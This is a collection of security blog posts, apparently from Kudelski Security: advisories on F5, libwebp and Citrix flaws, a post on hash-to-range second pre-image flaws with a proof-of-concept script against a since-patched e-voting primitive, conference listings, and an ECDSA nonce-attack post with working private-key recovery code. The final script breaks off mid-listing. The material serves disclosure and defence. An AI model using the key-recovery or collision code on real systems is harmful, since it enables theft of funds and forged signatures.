Follow the directions in F5’s advisory and apply the provided hotfix. Additionally, considering the TMUI service’s recent track record with RCE bugs, the CFC echoes F5’s and Praetorian’s recommendations to ensure the TMUI interface isn’t accessible via untrusted external networks or self IP addresses. Please see the advisory linked above for specific instructions.
At the time of writing, vulnerability scan plugins for CVE-2023-46747 have not been released, but are forthcoming. As soon as the plugins are available and vulnerability scans have run, clients with the relevant service will receive cases if applicable.
The CFC will continue to monitor the situation and decide on next steps like a threat hunting campaign if the relevant data are available and actionable.
Google/Heap Buffer Overflow Vulnerability in WebP (CVE-2023-4863)
Written by Michal Nowakowski of the Kudelski Security Threat Detection & Research Team
Following research into vulnerabilities discovered on September 7th that compromised Apple iOS version 16.6 and allowed the installation of the spyware known as Pegasus, Citizen Lab, together with Apple’s Security Engineering and Architecture team, notified Google of potential exploits in Google Chrome, and CVE-2023-4863 was assigned to the indicated vulnerability. On September 11th, Google released a Stable Channel Update for desktop versions of Chrome on Mac, Linux, and Windows.
Further analysis and investigation reveals that the impact of the aforementioned exploit extends well beyond Google Chrome: any application that relies on the libwebp library to handle WebP images is potentially vulnerable to this attack.
On September 27th, Google modified the CVE-2023-4863 entry and expanded its scope to the multitude of commonly used applications, libraries, frameworks, and operating systems that may be affected.
The list of systems affected by this vulnerability is significant (more than 700 entries) and includes widely used software like:
Many of them have already been patched. This includes, for example:
Applications
Operating Systems
Other Software
When exploited correctly, this vulnerability allows a remote attacker to write data outside the boundaries of the heap using a specially crafted lossless WebP file, and it is reachable across multiple browsers, operating systems, and applications.
WebP is an image format that allows high-quality images to be displayed on web pages with much smaller file sizes than traditional formats such as PNG and JPEG; its lossless mode is sometimes known as VP8L. libwebp, in turn, is the library that allows programs to support the WebP file format.
Apple and Citizen Lab, which coincidentally discovered the WebP vulnerability, were actually investigating an exploit found in a framework called Image I/O, which is part of Apple’s operating systems (iOS, iPadOS, watchOS, and macOS) and allows reading and writing various file formats, including WebP files. The core idea of the bug is to overflow the huffman_tables allocation in ReadHuffmanCodes (src/dec/vp8l_dec.c) by moving the huffman_table pointer beyond the pre-calculated kTableSize cache size. There are several pre-calculated bucket sizes depending on the number of color cache bits, but kTableSize only accounts for the first-level 8-bit table lookups, not the second-level tables. When BuildHuffmanTable() tries to populate a second-level table, it can therefore write data outside the allocation’s boundaries.
Attacks against this vulnerability can range from denial of service (DoS) to possible remote code execution (RCE).
The recommendation is to patch all impacted systems to the recommended versions and to check for the presence of affected software.
The CFC is reviewing all affected applications in our environment to make sure there is no impact or exploitation.
Clients who have subscribed to the vulnerability service will receive critical vulnerability reports with their next vulnerability scan runs.
We will continue to keep up to date with this vulnerability to provide further updates as they become available.
Incomplete disclosures by Apple and Google create “huge blindspot” for 0-day hunters | Ars Technica
https://www.tenable.com/cve/CVE-2023-4863/plugins
Chrome Releases: Stable Channel Update for Desktop (googleblog.com)
This article is a follow-up to the excellent blog post written last year by Pascal Junod, which explains the strange title. The former post was about flaws arising from the lack of domain separation when hashing different types of data. In this new post, we explore related flaws we have found in the wild in implementations of hash functions whose result needs to lie in a specific range.
As explained in Pascal Junod’s post, domain separation is a way to construct different hash functions from the same primitive. It avoids collisions when the same hash function is used to hash different data types or structured types. For example, if someone wants to hash the array [104, 101, 108, 108, 111], they may encode it as the bytes “68656c6c6f” and pass it to the hash function. The result will collide with the hash of the string “hello”, or of the array [6841708, 27759], which is undesirable for some applications. Proper domain separation avoids such flaws. This problem is still regularly found in deployed solutions: for example, we previously described flaws found during our audits of the io.finnet and Multisig Labs threshold cryptography implementations. More recently, another team built a private share recovery attack called TSSHOCK based on these findings.
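The collision is easy to reproduce; here is a minimal Python illustration (SHA-256 and the tag strings are our own choices for concreteness, not a standardized scheme):

```python
import hashlib

# Encoding the array [104, 101, 108, 108, 111] byte-by-byte yields
# exactly the byte string "hello", so the two inputs collide.
array_encoding = bytes([104, 101, 108, 108, 111])
print(array_encoding == b"hello")  # True
print(hashlib.sha256(array_encoding).digest() ==
      hashlib.sha256(b"hello").digest())  # True

# With domain separation, each input type gets its own prefix tag,
# and the collision disappears.
t_array = hashlib.sha256(b"array\x00" + array_encoding).digest()
t_string = hashlib.sha256(b"string\x00" + b"hello").digest()
print(t_array == t_string)  # False
```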
In this post we wanted to study the dual problem: what happens if we would like to hash values to a specific range, like integers less than a value q, to elliptic curve points, or even to more complex types?
Some modern constructions, like identity-based encryption, Verifiable Delay Functions (VDF), e-voting, BLS digital signatures, or the post-quantum McEliece cryptosystem, need a primitive to hash a value into a specific set. This function is usually not defined in the research paper, which leaves the implementer responsible for choosing it properly. In addition, the construction usually assumes that the hash function has the usual properties of a standard hash function, namely pre-image, second pre-image, and collision resistance; additionally, for some constructions, the hash function should emulate a random oracle and thus output uniformly distributed random values.
For example, the function SHA3-384 outputs values which can be interpreted as integers between 0 and 2^384 - 1. For any power of 2, an Extendable Output Function (XOF) can be used, like SHAKE256 or even cSHAKE to guarantee domain separation: it generates any integer between 0 and 2^n - 1 for an n-bit output.
For example in Python, if we want to hash a string to a number less than 2^16, we can run:
>>> import hashlib
>>> s = b"Nobody inspects the spammish repetition"
>>> int(hashlib.shake_256(s).hexdigest(2), 16)
17520

However, how do we hash a value to the interval [0, q - 1] with q not being a power of two, for example q being the BLS12-381 curve order? Those problems have been well studied in the past, and we will explain how some constructions made with secure hash functions can lead to insecure results, and which construction to use to solve this problem.
The naive approach would be to hash the value and take the result modulo q. However, we often need values to be uniformly distributed over the whole range, and this approach does not solve the problem of hashing to a more complex set like a group of elliptic curve points. As explained in a previous blog post, the modular reduction results in values that are not uniformly distributed: some values will be more probable than others. Depending on the size of the bias, this may be inadequate for protocols using a hash function and assuming random behavior. This is the case for protocols relying on the Fiat–Shamir transformation, where the hash function is assumed to behave as a random oracle.
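The bias is easy to see with small numbers; here is a toy Python sketch, with a uniform 8-bit value standing in for a hash output and 200 standing in for q:

```python
# Reduce every 8-bit value (0..255) modulo q = 200: the residues
# 0..55 have two preimages (r and r + 200), while 56..199 have only
# one, so small residues are twice as likely as large ones.
q = 200
counts = [0] * q
for x in range(256):
    counts[x % q] += 1

print(counts[0], counts[100])  # 2 1
```

The same skew appears whenever a b-bit hash is reduced modulo q and 2^b is not a multiple of q; it only becomes negligible when 2^b is much larger than q.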
A method similar to rejection sampling for random value generation is called “hunt-and-peck”, or sometimes the “try-and-increment” method. It consists in hashing a value and, if the result does not satisfy the desired output constraints, hashing again until a satisfying value is found. A naive implementation of such a method would be:
import hashlib

s = b"Nobody inspects the spammish repetition"
q = 0x1a0111ea397fe69a4b1ba7b6434bacd764774b84f38512bf6730d2a0f6b0f6241eabfffeb153ffffb9feffffffffaaab
while True:
    h = hashlib.sha3_384(s).digest()
    h_int = int.from_bytes(h, "big")
    if h_int < q:
        break
    s = h
print(f"hash: {h_int}")

We take the input string, hash it with SHA3-384, transform the digest into an integer, and compare it with q (the BLS12-381 curve order); if the value is smaller than q, we output it. At the end we have an integer within the desired range:
hash: 466802949991240959638695195289112782003214451371371177487434259700090952460729664879919264417968882381626697562991
However, this new function is not second pre-image resistant, even though SHA3-384 is secure. Indeed, if we print all the intermediate values in the while loop, we obtain:
hash: 23137220369973484377265887243569191346100483129771156387135144547456769712871740599682813528628879944752756968974946
hash: 4799338951322221704001266792102607278636860761731048000187844273144216713087340391657809976969889746113658783263501
hash: 31716994179996713780745603112864241593156066107008767210335595746891411579808647586409712124449922745051863682425891
hash: 33057019732402171167317891841094942089241481235768960620203022480520723235635591889485122017075342314445605653261792
hash: 6868136950288026075232263416539860651777920205102832818155068238833644446416649005650016224862851787880832921908269
hash: 22748065012834597045506904998237282232688457796962528509183870223455258079719138292929491465597511441781142510793740
hash: 8487665222831421746205648827090832729990406203108570795821686918493012585585156403884755993275197374472206949316440
hash: 11845129742337035831031550559334918177370659708015594781961786949561029488376363251397691522368459978971541344556850
hash: 16836971551032022124113289508056539700229076909962170679660431507603067422230552915330374164223401170221136111112554
hash: 466802949991240959638695195289112782003214451371371177487434259700090952460729664879919264417968882381626697562991

We have generated 9 different values larger than q before getting a good one. It means that all these values map to the same output in our new hash function! Thus, we have generated 9 second pre-images of our initial input, which clearly violates the security of the construction.
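We can verify this directly: under the naive construction above, a rejected intermediate digest is a second pre-image of the original message. A sketch wrapping the loop in a function:

```python
import hashlib

# BLS12-381 curve order, as above.
q = 0x1a0111ea397fe69a4b1ba7b6434bacd764774b84f38512bf6730d2a0f6b0f6241eabfffeb153ffffb9feffffffffaaab

def naive_hash_to_zq(s: bytes) -> int:
    # The flawed construction: keep re-hashing the digest until it is < q.
    while True:
        h = hashlib.sha3_384(s).digest()
        h_int = int.from_bytes(h, "big")
        if h_int < q:
            return h_int
        s = h

m = b"Nobody inspects the spammish repetition"
# The first digest of m exceeds q (it was rejected above), so feeding it
# back in starts the exact same chain as m itself.
second_preimage = hashlib.sha3_384(m).digest()
print(naive_hash_to_zq(m) == naive_hash_to_zq(second_preimage))  # True
```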
Some variants of this approach have been used in practice. For example, the Swiss Post e-voting system used such a primitive. This e-voting system was tested in a real vote in 3 Swiss cantons on June 18th, 2023. The full specification and source code have been published, and the security has been studied for a long time through their bug bounty program.
Here is the algorithm RecursiveHashToZq defined in the cryptographic primitives specification version 1.2.0:

Basically, the algorithm takes the input value v, hashes it with the function RecursiveHashOfLength, tests whether the resulting value h is less than q and, if not, computes the hash of the value h || v, and so on. Here again, we can construct second pre-images for the hash function: if the first value of h is bigger than q, then the values v and h || v give the same hash result.
Here is a simple proof-of-concept demonstrating how to obtain a second pre-image:
from base64 import b64decode

# recursive_hash_zq implements the RecursiveHashToZq algorithm above.
q = 0x5BF0A8B1457695355FB8AC404E7A79E3B1738B079C5A6D2B53C26C8228C867F799273B9C49367DF2FA5FC6C6C618EBB1ED0364055D88C2F5A7BE3DABABFACAC24867EA3EBE0CDDA10AC6CAAA7BDA35E76AAE26BCFEAF926B309E18E1C1CD16EFC54D13B5E7DFD0E43BE2B1426D5BCE6A6159949E9074F2F5781563056649F6C3A21152976591C7F772D5B56EC1AFE8D03A9E8547BC729BE95CADDBCEC6E57632160F4F91DC14DAE13C05F9C39BEFC5D98068099A50685EC322E5FD39D30B07FF1C9E2465DDE5030787FC763698DF5AE6776BF9785D84400B8B1DE306FA2D07658DE6944D8365DFF510D68470C23F9FB9BC6AB676CA3206B77869E9BDF3380470C368DF93ADCD920EF5B23A4D23EFEFDCB31961F5830DB2395DFC26130A2724E1682619277886F289E9FA88A5C5AE9BA6C9E5C43CE3EA97FEB95D0557393BED3DD0DA578A446C741B578A432F361BD5B43B7F3485AB88909C1579A0D7F4A7BBDE783641DC7FAB3AF84BC83A56CD3C3DE2DCDEA5862C9BE9F6F261D3C9CB20CE6B
v1 = b64decode("q83vASNFZ4k=")
h1 = recursive_hash_zq(q, v1)
step = 2538118759407973171811146791368667131241954935495059548630024689747655732678862557749208435969481107380814459665436536211726574891524612823116096131054900164615638966852739602583479562164823495846089556214653879414974498552902588208831350530871038078848054972266771595210321852709605285281094527904412339617311242945847373101364946953130610527817606716680070281102317872706055312245578016183191827376346092632337077166213335586307634755713948460350175685675452215190746056089690264045459643653603216880954927389434235673870858140902530600337552548992841814248314799389339609146507565655896887086919578297478830437457503474171229695140636541060083558747685412094825488085333353282723017400668288679218497723786307591379551476639363407409861045564065248885305686707532686471051481169924771998589593761370455327660724258467435909252074202410183923893361380423652361294929074328945703188531669087036325745880447022845110306798617
v2 = [step, v1]
h2 = recursive_hash_zq(q, v2)
print(h1 == h2)

We chose v1 to be a message used in the tests of the library, encoded in Base64, and step is an intermediate value we recovered from the first computation of the hash h1 by the function recursive_hash_zq. We then obtained a second hash h2 from the different input [step, v1] which collides with the first hash, so we have the same problem here as before. This problem was reported to Swiss Post and patched quickly. Now, the function uses a XOF to hash the value to an integer in [0, 2^{log2(q)+256}] and then reduces it modulo q. There is still a bias as explained before, but it is of order 2^-256, which is too small to be exploited and coherent with the security level of the whole system. This method is described in the IETF draft “Hashing to Elliptic Curves” under the name hash_to_field, and in “Appendix B—Hashing into a Range (Informative)” of the SHA-3 Derived Functions specification.
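For reference, here is a minimal sketch of this oversample-then-reduce approach. It is our own simplified version; the IETF draft’s hash_to_field additionally specifies domain separation tags and an expand_message routine.

```python
import hashlib

def hash_to_range(msg: bytes, q: int) -> int:
    # Draw log2(q) + 256 bits from a XOF, then reduce modulo q.
    # The residual bias of the reduction is on the order of 2**-256,
    # i.e. negligible, and the function runs in a single pass, so the
    # second pre-image problem of the rejection loop does not arise.
    n_bytes = (q.bit_length() + 256 + 7) // 8
    h = hashlib.shake_256(msg).digest(n_bytes)
    return int.from_bytes(h, "big") % q

# BLS12-381 curve order, as used in the examples above.
q = 0x1a0111ea397fe69a4b1ba7b6434bacd764774b84f38512bf6730d2a0f6b0f6241eabfffeb153ffffb9feffffffffaaab
x = hash_to_range(b"Nobody inspects the spammish repetition", q)
print(0 <= x < q)  # True
```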
This problem was also found in the Kyber Crypto Library for Go during our audit of its timelock encryption; it has been corrected with a solution described below. A similar construction is used in the Classic McEliece public-key cryptosystem to generate a private key: a 256-bit seed is used to generate the much larger private key, and if the generation fails, the seed is hashed again until the private key is properly generated. This means that different seeds can end up generating the same private key. However, the Classic McEliece team found this issue not to be harmful, since it only reduces the entropy of the private key to 254 bits.
The previous hunt-and-peck method can be implemented in a more robust way. For example, the BLS signature scheme uses an algorithm called MapToGroup to map a message to a point of an elliptic curve subgroup. It is defined as follows:

Basically, a hash value is computed from the message M and the iteration number i until a valid point on the elliptic curve is found. Since the iteration number is concatenated with the message, this prevents the second pre-image attack described above. Note that the iteration number has to be encoded on I bits, otherwise the earlier domain separation problem may arise. This construction works and is proven secure in the random oracle model in the paper.
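In Python, the counter variant for hashing into Z_q would look roughly like this. This is our own sketch of the idea; MapToGroup itself additionally maps the accepted candidate to a curve point.

```python
import hashlib

def hash_with_counter(msg: bytes, q: int, counter_bytes: int = 4) -> int:
    # Hash (i || msg) for i = 0, 1, 2, ... until the digest, read as an
    # integer, falls below q. Because the counter is part of the input
    # (encoded on a fixed number of bytes), rejected candidates are not
    # second pre-images of the accepted one.
    for i in range(256 ** counter_bytes):
        data = i.to_bytes(counter_bytes, "big") + msg
        h_int = int.from_bytes(hashlib.sha3_384(data).digest(), "big")
        if h_int < q:
            return h_int
    raise RuntimeError("no candidate below q found (astronomically unlikely)")

# BLS12-381 curve order, as above.
q = 0x1a0111ea397fe69a4b1ba7b6434bacd764774b84f38512bf6730d2a0f6b0f6241eabfffeb153ffffb9feffffffffaaab
print(0 <= hash_with_counter(b"hello", q) < q)  # True
```

Note that the number of loop iterations still depends on the input.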
However, this approach is not constant time, since the total number of iterations depends on the message being hashed, and it may lead to timing attacks. For example, the Dragonfly handshake used by WPA3 maps a password to an elliptic curve point this way, which led to side-channel leakage of the password used to authenticate a client on a WiFi network. This is why the hunt-and-peck method is not recommended by the IETF draft.
Getting a uniformly distributed value in a specific range from a hash function can be tricky, and custom solutions often have flaws leading to insecure constructions. If you need to implement such a method, a constant-time solution for hashing values to a finite field is the hash_to_field method defined in the IETF draft “Hashing to Elliptic Curves”. To hash values to a group of elliptic curve points, the solution defined in the same IETF draft is a good option. To obtain hash results in a more complex set, the MapToGroup solution, with the iteration counter hashed together with the value, is an option, but this construction may suffer from timing attacks depending on the security context.
I would like to thank Nils Amiet and Pascal Junod for their valuable comments on this blog post.
We are a few weeks away from Black Hat and DEF CON. As everyone prepares their travel for the annual trek out to the desert, we wanted to let you know about a few presentations and events our team is participating in across these two cybersecurity venues. We are bringing our expertise in multiple disciplines, including AI security, privacy, and cryptography, and sharing what we’ve learned with you. So, mark your calendars and join us.
Event: Black Hat
Date: Wednesday, August 9th. 11:00am – 1:00pm
Location: Beach Bungalow at the Moorea Beach Club Deck (Mandalay Bay)

We kick off the week with a discussion around some of the hottest technology topics. This is a meet and greet with Senior Cryptography and Quantum Security Expert Tommaso Gagliardoni and Senior Director of Research and Black Hat’s AI, ML, and Data Science track lead Nathan Hamiel. Join us for some food and drinks as well as a casual conversation about security and emerging technology. These are rapidly advancing fields, and we can help by sharing our perspectives and answering your questions.
Event: Black Hat
Date: Wednesday, August 9th. 3:20pm – 4:00pm
Location: South Pacific I, Level 0

AI Security has become an incredibly hot topic with no shortage of challenges and open problems, leaving security professionals scrambling to catch up with emerging techniques and very little to go on. While the slow-moving machinery of industry does its best to catch up, that doesn’t help the many who face these challenges today. Where do you start? What can you do? What have you seen work?
Join Senior Director of Research and Black Hat Review Board member Nathan Hamiel along with Senior Researcher Vishruta Rudresh, for a community conversation on the hottest topic in tech and the resulting challenges. We’ll discuss challenges, solutions, and open problems in this evolving space. This is a community meetup event, so meet your peers, share your perspective, and be part of the conversation. I hope we can have a discussion on how we as a community can tackle these challenges, and all perspectives are welcome. Looking forward to the conversation.
More information is available here.
Event: Black Hat
Date: Thursday, August 10th. 1:30pm – 2:10pm
Location: Oceanside A, Level 2

This year witnessed AI hype hitting unprecedented levels, and if you believe the press, no industry is safe, including the security industry. It may be obvious that hype-fueled, rapid adoption has negative side effects, but when article after article claims if you don’t use AI, you’ll be replaced, the allure can be hard to ignore. Adding to this, there are privacy concerns, proposed regulations, legal issues, and a whole pile of other challenges. So, what does all of this mean for security?
Join Nathan Hamiel along with other industry experts for a grounded conversation where we puncture the hype and focus on the realities of AI affecting security professionals. We discuss the impact of generative AI on the security industry, its risks, the realities, and what you need to know to travel the road ahead.
More information is available here.
Event: DEF CON Demo Labs
Date: Friday, August 11th. 12:00pm – 1:55pm
Location: Unity Boardroom, Caesar’s Forum

Shufflecake is a FOSS tool for Linux that allows creation of multiple hidden volumes on a storage device in such a way that it is very difficult, even under forensic inspection, to prove the existence of such volumes without the right password(s). You can consider Shufflecake a “spiritual successor” of tools such as TrueCrypt and VeraCrypt, but vastly improved: it works natively on Linux, it supports any filesystem of choice, and it can manage multiple nested volumes per device, making the deniability of these volumes truly plausible.
Join Senior Cryptography Expert Tommaso Gagliardoni and former Master’s student on the Kudelski Security Research Team Elia Anzuoni as they push the envelope forward, bringing stronger privacy to vulnerable groups.
Event: DEF CON
Date: Saturday, August 12th. 5pm
Location: Track 2

ECDSA is a widely used digital signature algorithm. ECDSA signatures can be found everywhere since they are public. In this talk, we tell a tale of how we discovered a novel attack against ECDSA and how we applied it to datasets we found in the wild, including the Bitcoin and Ethereum networks.
Although we didn’t recover Satoshi’s private key (we’d be throwing a party on our private yacht instead of writing this abstract), we could see evidence that someone had previously attacked vulnerable wallets with a different exploit and drained them. We cover our journey, findings, and the rabbit holes we explored. We also provide an academic paper with the details of the attack and open-source code implementing it, so people building software and products using ECDSA can identify and avoid this vulnerability in their systems. We’ve only scratched the surface; there’s still plenty of room for exploration.
Join Lead Prototyping Engineer Nils Amiet and Principal Cryptographer Marco Macchetti for an exploration into this attack and how you can ensure these issues don’t surface in your products.
We have lots going on and will be out in Vegas for the week attending multiple events scattered across both Black Hat and DEF CON. We’d love to meet you, so please don’t hesitate to reach out. Enjoy Vegas and we’ll see you there!
Written by Eric Dodge and Harish Segar of the Kudelski Security Threat Detection & Research Team
Citrix recently disclosed a handful of vulnerabilities: cross-site scripting, privilege escalation, and unauthenticated remote code execution. These target Citrix ADC (NetScaler ADC) and Citrix Gateway (NetScaler Gateway). All three have prerequisites for successful exploitation, with the most concerning being the remote code execution, due to its more trivial requirements: it needs neither authenticated access nor user interaction. The vulnerabilities are scored as follows: XSS 8.3, privilege escalation 8.0, unauthenticated RCE 9.8.
Currently, there is no proposed workaround, but it is advised to patch any impacted systems, as CVE-2023-3519 exploitation has already been observed.
Product | Affected versions | Fixed versions
NetScaler ADC and NetScaler Gateway | 13.1 before 13.1-49.13 | 13.1-49.13 and later releases
NetScaler ADC and NetScaler Gateway | 13.0 before 13.0-91.13 | 13.0-91.13 and later releases of 13.0
NetScaler ADC | 13.1-FIPS before 13.1-37.159 | 13.1-FIPS 13.1-37.159 and later releases of 13.1-FIPS
NetScaler ADC | 12.1-FIPS before 12.1-65.36 | 12.1-FIPS 12.1-65.36 and later releases of 12.1-FIPS
NetScaler ADC | 12.1-NDcPP before 12.1-65.36 | 12.1-NDcPP 12.1-65.36 and later releases of 12.1-NDcPP
Additionally, this only applies to impacted systems managed by customers; it does not impact Citrix-managed cloud services or Adaptive Authentication.
The RCE vulnerability, when exploited successfully, allows execution of remote code while unauthenticated. The only requirement is that the impacted appliance must be configured as either a gateway or an AAA virtual server. In terms of the gateway, possible configurations include VPN virtual servers, ICA proxies, CVPNs, and RDP proxies. The vulnerability targets a failure to control code generation, i.e., code injection. This is typically possible when the product insufficiently separates control-plane code from user-controlled input on the data plane, allowing an attacker to craft specific input that alters the control flow. That in turn leads to the potential for arbitrary code execution.
The XSS vulnerability has more stringent requirements to be effective. It hinges on a victim navigating to an attacker-controlled link, and additionally requires the victim to have connectivity to the NSIP. The vulnerability is rooted in improper input validation, which allows malicious input to alter control flow, gain arbitrary control of a resource, or achieve arbitrary code execution.
The privilege escalation vulnerability requires authenticated access to either the NSIP or SNIP, including access to the management interface. This means it requires an additional vector for initial access in order to be successful. Proper privilege management and monitoring can assist in detecting and preventing this from occurring.
Kudelski Security recommends identifying, validating, and implementing the security update for any affected systems as soon as possible.
The CFC will continue to keep up to date with this vulnerability to provide further updates as they become available.
Public blockchains have a long history of attacks on their ECDSA signatures. Since all transactions are publicly available, they make a perfect experimental field for cryptographic attacks. A lattice attack was recently published under the name “The curious case of the half-half Bitcoin ECDSA nonces” and experimented against Bitcoin. As a Swiss team loving half-and-half cheese fondue, we had to investigate such an attack. We discovered that our previous attack, “Polynonce“, is also applicable to this way of generating ECDSA nonces. We explain how in this post and compare the results we obtained with those of the paper.
To sign a message, ECDSA uses a value called a nonce. The nonce has to be randomly generated and unique for each message to be signed. For the Bitcoin and Ethereum secp256k1 curve, typical nonce values look like:
0x23fcec8739ec6612ac802e0b5529ec7dc34bed8e994e8019c66d30d961801cc8
0xdc2b71ec23803bdeda72fc10c6a7033a6b23d01c9f6560647c2c4cd91262adc1
0xc628cace75fcfa8c0a0cd18639b7af14e1194d9fffe999ee139b898b701c46e0
0x45b431b3bb8ed7e84209d99f529bc59555fa33c896d22a88b3301e08d3478694
ECDSA has a well-known and well-studied pitfall, namely nonce reuse. As its name suggests, if a nonce is ever reused for different signatures, the private key can be recovered from those signatures; unsurprisingly, the first attack applied to blockchains was the nonce-reuse attack. As soon as two different messages have been signed with the same nonce, the private key is compromised. This problem is usually solved by generating deterministic nonces following RFC 6979.
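To make the pitfall concrete, here is a minimal, self-contained sketch of nonce-reuse key recovery over secp256k1. The private key, nonce, and messages are made up for illustration, and the curve arithmetic is a toy (non-constant-time) implementation:

```python
# Sketch of the ECDSA nonce-reuse attack over secp256k1 (illustrative only).
import hashlib

# secp256k1 domain parameters
p = 2**256 - 2**32 - 977
n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)

def ec_add(P, Q):
    if P is None: return Q
    if Q is None: return P
    if P[0] == Q[0] and (P[1] + Q[1]) % p == 0: return None  # P + (-P) = O
    if P == Q:
        lam = 3 * P[0] * P[0] * pow(2 * P[1], -1, p) % p     # tangent slope
    else:
        lam = (Q[1] - P[1]) * pow(Q[0] - P[0], -1, p) % p    # chord slope
    x = (lam * lam - P[0] - Q[0]) % p
    return (x, (lam * (P[0] - x) - P[1]) % p)

def ec_mul(k, P):
    R = None
    while k:                       # double-and-add scalar multiplication
        if k & 1: R = ec_add(R, P)
        P = ec_add(P, P)
        k >>= 1
    return R

def sign(d, h, k):
    r = ec_mul(k, G)[0] % n
    return r, pow(k, -1, n) * (h + r * d) % n

h1 = int.from_bytes(hashlib.sha256(b"first message").digest(), "big")
h2 = int.from_bytes(hashlib.sha256(b"second message").digest(), "big")
d = 0xC0DEF00D12345678   # hypothetical private key
k = 0xDEADBEEF0BADF00D   # the same nonce used twice: the fatal mistake
r1, s1 = sign(d, h1, k)
r2, s2 = sign(d, h2, k)

# Same nonce => r1 == r2, and subtracting the two signature equations gives
#   k = (h1 - h2) / (s1 - s2) mod n, then d = (s1*k - h1) / r1 mod n
k_rec = (h1 - h2) * pow(s1 - s2, -1, n) % n
d_rec = (s1 * k_rec - h1) * pow(r1, -1, n) % n
assert (k_rec, d_rec) == (k, d)
```

The two lines of modular algebra at the end are all an attacker needs once two signatures share an r value.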
However, ECDSA nonces are so critical that even bias in their generation leads to private key recovery. Thus, more clever attacks were later applied to public blockchains involving lattice attacks. Those attacks allowed recovery of nonces that are shorter than expected, with lengths 64, 110, 128, and 160 bits. For example, nonces generated like the following are vulnerable to lattice attacks:
0x0000000000000000000000000000000010c361aa85f453d667fbb7d320576ea9
0x00000000000000000000000000000000a95d25b18bb61df61f328e0a91c9d53e
0x00000000000000000000000006afcace4e73a45bb0d98b3d25e7ba49b8b4cbbe
0x00000000000000000000000088b58851f592bc1782378fbc162c42b91ef52d16
The smaller the nonce, the smaller the dimension of the lattice used for the attack, and the fewer signatures are needed for the attack to succeed. According to the “Biased Nonce Sense” paper, two signatures with 128-bit nonces and a 3-dimensional lattice give a 75% probability of success (key recovery). From three signatures with 170-bit nonces and a 4-dimensional lattice, we get a 95% probability of success, and so on. A variant of the attack also applies to nonces with shared prefixes or suffixes. For example, nonces sharing a prefix like the following are also vulnerable, as are common-suffix constructions:
0xc25f1a2a398cf22f20c08eda2457930114792ddbafe16f1866c3a9ce28aeaa15
0xc25f1a2a398cf22f20c08eda24579301263f58f69740fb6d928ae40fe38ebfd0
Another way of attacking ECDSA is by assuming an algebraic relation between the nonces. This approach was proposed by our team with the Polynonce attack. It assumes a polynomial relation between consecutive nonces k_{i+1} and k_i, for unknown coefficients a_j, of the form:

k_{i+1} = a_1 * k_i + a_0 mod n

or

k_{i+1} = a_2 * k_i^2 + a_1 * k_i + a_0 mod n
Then the Polynonce attack is able to recover the private key algebraically with a 100% success probability, but it needs 4 signatures in the linear case, 5 in the quadratic case, and so on. The attack mainly relies on solving polynomial equations and is thus very fast compared to lattice attacks. For more details, this attack will be presented at the upcoming DEF CON conference.
All the previous attacks require at least two different signatures from the same private key. However, some wallets like Ledger sign transactions with a single private key and then change it. This would explain why nowadays a lot of Bitcoin public addresses are used only once. Here is a log-scale plot of our dump of the Bitcoin blockchain (up to block 752759 on September 5, 2022), limited to P2PKH transactions:

This shows that 92% of the public keys used for P2PKH transactions are used only once. This practice was mainly introduced to protect privacy, but indirectly it also protects against the previous attacks. For Ethereum, the landscape is a bit different. We have analyzed 1,759,432,087 signatures from 151,429,561 unique keys and plotted the distribution on a linear scale:

This is quite different: 42% of public keys are used for a single signature, 22% for two, 13% for three, and so on. Thus, it seems that privacy-preserving address practices are less deployed, or less applicable, on Ethereum.
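The reuse statistics above boil down to a simple counting pass over (public key, signature) pairs extracted from a chain dump. Here is a minimal sketch with made-up data (the key and signature names are placeholders, not real chain values):

```python
# Counting how often each public key signs, then bucketing keys by that count.
from collections import Counter

# Hypothetical stream of (public_key, signature) pairs from a blockchain dump
sigs = [("keyA", "sig1"), ("keyA", "sig2"),
        ("keyB", "sig3"), ("keyC", "sig4")]

per_key = Counter(pk for pk, _ in sigs)     # signatures seen per public key
histogram = Counter(per_key.values())       # number of keys per usage count
single = histogram[1] / len(per_key)        # fraction of single-use keys
```

With this toy input, two of the three keys are single-use, which is exactly the quantity plotted above for Bitcoin and Ethereum.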
Recently, a new attack presented results for nonces generated as the upper half of the message hash concatenated with the upper half of the private key. Meaning that the nonce k can be written as:

k = MSB128(h) * 2^128 + MSB128(d)

where MSB128(x) denotes the 128 most significant bits of the 256-bit value x, h is the message hash, and d is the private key. The novelty of this attack is that it allows recovery of the secret key d from a single signature. Similarly to previous lattice attacks, the expression for k can be injected into the ECDSA formula and rearranged to form an instance of the Hidden Number Problem. This instance is then solved with the BKZ algorithm. The technique is very powerful, as a single signature is sufficient, which allows the attack to be applied to transactions issued by private keys that were used only once. The optimized version of the attack is able to recover a private key with a 99.99% success rate in 0.48 seconds. This is quite powerful, but it took the authors 49 CPU-years to run the attack on the Bitcoin blockchain.
While reading the new half-half attack, we figured out that Polynonce can also be adapted to recover such private keys when half-half nonces are used. From an ECDSA signature (r, s), a message hash h, and a private key d, we have the following relation for the nonce:

k = s^-1 * (h + r*d) mod n

If we have two nonces k1 and k2 generated with the previous half-half formula, the shared MSB128(d) term cancels when we take the difference, and we get:

s1^-1 * (h1 + r1*d) - s2^-1 * (h2 + r2*d) = (MSB128(h1) - MSB128(h2)) * 2^128 mod n

We have found a linear equation in d with all the other values known. It gives a very fast way of solving the equation and recovering the private key d. However, with Polynonce, two nonces, and thus two signatures from the same private key, are required. We have lost a big advantage w.r.t. the previous attack. Nevertheless, since this attack variant is very fast, it can be applied first on public keys having multiple signatures, and then the lattice attack can be applied on the remaining signatures.
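The linear recovery can be sketched end-to-end in plain Python with a hypothetical key and messages. This sketch signs directly (skipping Bitcoin's low-s normalization, so no sign guessing is needed) and uses toy, non-constant-time secp256k1 arithmetic:

```python
# Sketch of the half-half nonce recovery via one linear equation in d.
import hashlib

p = 2**256 - 2**32 - 977
n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)

def ec_add(P, Q):
    if P is None: return Q
    if Q is None: return P
    if P[0] == Q[0] and (P[1] + Q[1]) % p == 0: return None
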